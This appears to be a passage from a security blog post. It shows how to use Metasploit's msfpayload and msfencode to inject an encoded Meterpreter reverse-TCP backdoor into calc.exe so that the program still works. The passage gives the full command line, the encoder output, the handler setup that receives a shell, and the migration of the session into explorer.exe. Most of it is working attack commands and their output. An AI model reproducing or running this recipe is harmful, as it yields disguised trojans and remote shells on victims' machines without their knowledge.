an existing executable and the new executable still fun-
ction like the original. So if you inject into calc.exe you
get calc.exe and your backdoor.
let's see the new msfencode options:
Usage: ./msfencode
OPTIONS:
-a
-b
-c
-e
-h Help banner
-i
-k Keep template work; run payload in new thread (use -x)
-l List available encoders
-m
-n Dump encoder information
-o
-p
-s
-t
-x
Let's make our new backdoored executable:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 \
R | ./msfencode -t exe -x calc.exe -k -o calc-back.exe \
-e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iter=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iter=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iter=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iter=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iter=5)
Get the backdoored exe on the other box and execute it.
We have a functional calc.exe and our shell. =)
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
Keep in mind that you'll still need to migrate away from
the backdoored executable process because if they close
the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc-back.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
[*] SRC
biOos
No comments:
Post a Comment